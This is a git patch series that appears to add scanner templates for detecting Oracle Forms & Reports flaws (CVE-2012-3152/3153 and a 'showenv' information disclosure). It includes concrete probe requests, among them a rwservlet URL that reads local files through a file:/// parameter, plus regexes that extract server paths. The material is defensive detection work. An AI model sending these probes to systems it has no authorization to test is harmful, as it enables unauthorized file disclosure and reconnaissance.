From ec835a0bc5ee79d8332e8099e7f386aec293411a Mon Sep 17 00:00:00 2001 From: Sidahmed Date: Mon, 21 Jun 2021 09:48:42 +0100 Subject: [PATCH 1/3] Create CVE-2012-3152, CVE-2012-3153 --- cves/2012/CVE-2012-3153.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100755 cves/2012/CVE-2012-3153.yaml diff --git a/cves/2012/CVE-2012-3153.yaml b/cves/2012/CVE-2012-3153.yaml new file mode 100755 index 0000000000..b36b3383a9 --- /dev/null +++ b/cves/2012/CVE-2012-3153.yaml @@ -0,0 +1,26 @@ +id: CVE-2012-3152,CVE-2012-3153 + +info: + name: Oracle Forms & Reports RCE + author: Sid Ahmed MALAOUI @ Realistic Security + severity: critical + description: | + Unspecified vulnerability in the Oracle Reports Developer component in Oracle Fusion Middleware 11.1.1.4, + 11.1.1.6, and 11.1.2.0 allows remote attackers to affect confidentiality and integrity via unknown + vectors related to Report Server Component. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2012-3152 + - https://www.exploit-db.com/exploits/31737 + tags: cve,cve2012,oracle,rce + +requests: + - method: GET + path: + - "{{BaseURL}}/reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:///" + matchers: + - type: word + words: + - "" + - "" + part: body + negative: true From b45e0f1206879bf920301ff7a49d44e5b776e512 Mon Sep 17 00:00:00 2001 From: Sidahmed Date: Mon, 21 Jun 2021 09:49:51 +0100 Subject: [PATCH 2/3] Create "Oracle Forms & Reports Information Disclosure" Vulnerability --- .../oracle-forms-information-exposure.yaml | 34 +++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100755 vulnerabilities/oracle/oracle-forms-information-exposure.yaml diff --git a/vulnerabilities/oracle/oracle-forms-information-exposure.yaml b/vulnerabilities/oracle/oracle-forms-information-exposure.yaml new file mode 100755 index 0000000000..09bfaf0aa0 --- /dev/null +++ b/vulnerabilities/oracle/oracle-forms-information-exposure.yaml @@ -0,0 +1,34 @@ +id: oracle-forms-information-disclosure + +info: + name: Oracle Forms & Reports Information Disclosure + author: Sid Ahmed MALAOUI @ Realistic Security + severity: low + description: | + Disclosing informations about Oracle Forms installation environment. + tags: oracle + +requests: + - method: GET + path: + - "{{BaseURL}}/reports/rwservlet/showenv" + matchers: + - type: regex + part: body + regex: + - "\\\\.*\\\\showenv" + - type: regex + part: body + regex: + - "/.*/showenv" + extractors: + - type: regex + name: windows_working_path + part: body + regex: + - ".?.?\\\\.*\\\\showenv" + - type: regex + name: linux_path + part: body + regex: + - "/.*/showenv" From 672acb880e77f185e31eb3f954fdb3163eab384f Mon Sep 17 00:00:00 2001 From: Sidahmed Date: Tue, 22 Jun 2021 14:52:51 +0100 Subject: [PATCH 3/3] Updated Oracle Forms & Reports CVE-2012-3153 --- cves/2012/CVE-2012-3153.yaml | 38 ++++++++++++++----- .../oracle-forms-information-exposure.yaml | 34 ----------------- 2 files changed, 28 insertions(+), 44 deletions(-) delete mode 100755 vulnerabilities/oracle/oracle-forms-information-exposure.yaml diff --git a/cves/2012/CVE-2012-3153.yaml b/cves/2012/CVE-2012-3153.yaml index b36b3383a9..0ab2874518 100755 --- a/cves/2012/CVE-2012-3153.yaml +++ b/cves/2012/CVE-2012-3153.yaml @@ -1,12 +1,12 @@ -id: CVE-2012-3152,CVE-2012-3153 +id: CVE-2012-3153 info: - name: Oracle Forms & Reports RCE + name: Oracle Forms & Reports RCE (CVE-2012-3152 & CVE-2012-3153) author: Sid Ahmed MALAOUI @ Realistic Security severity: critical description: | - Unspecified vulnerability in the Oracle Reports Developer component in Oracle Fusion Middleware 11.1.1.4, - 11.1.1.6, and 11.1.2.0 allows remote attackers to affect confidentiality and integrity via unknown + Unspecified vulnerability in the Oracle Reports Developer component in Oracle Fusion Middleware 11.1.1.4, + 11.1.1.6, and 11.1.2.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Report Server Component. reference: - https://nvd.nist.gov/vuln/detail/CVE-2012-3152 @@ -16,11 +16,29 @@ info: requests: - method: GET path: + - "{{BaseURL}}/reports/rwservlet/showenv" - "{{BaseURL}}/reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:///" + req-condition: true + matchers-condition: and matchers: - - type: word - words: - - "" - - "" - part: body - negative: true + - type: dsl + dsl: + - '!contains(body_2, "")' + - '!contains(body_2, "")' + condition: and + - type: dsl + dsl: + - 'regex("\\\\.*\\\\showenv", body_1)' + - 'regex("/.*/showenv", body_1)' + condition: or + extractors: + - type: regex + name: windows_working_path + part: body_1 + regex: + - ".?.?\\\\.*\\\\showenv" + - type: regex + name: linux_working_path + part: body_1 + regex: + - "/.*/showenv" diff --git a/vulnerabilities/oracle/oracle-forms-information-exposure.yaml b/vulnerabilities/oracle/oracle-forms-information-exposure.yaml deleted file mode 100755 index 09bfaf0aa0..0000000000 --- a/vulnerabilities/oracle/oracle-forms-information-exposure.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: oracle-forms-information-disclosure - -info: - name: Oracle Forms & Reports Information Disclosure - author: Sid Ahmed MALAOUI @ Realistic Security - severity: low - description: | - Disclosing informations about Oracle Forms installation environment. - tags: oracle - -requests: - - method: GET - path: - - "{{BaseURL}}/reports/rwservlet/showenv" - matchers: - - type: regex - part: body - regex: - - "\\\\.*\\\\showenv" - - type: regex - part: body - regex: - - "/.*/showenv" - extractors: - - type: regex - name: windows_working_path - part: body - regex: - - ".?.?\\\\.*\\\\showenv" - - type: regex - name: linux_path - part: body - regex: - - "/.*/showenv"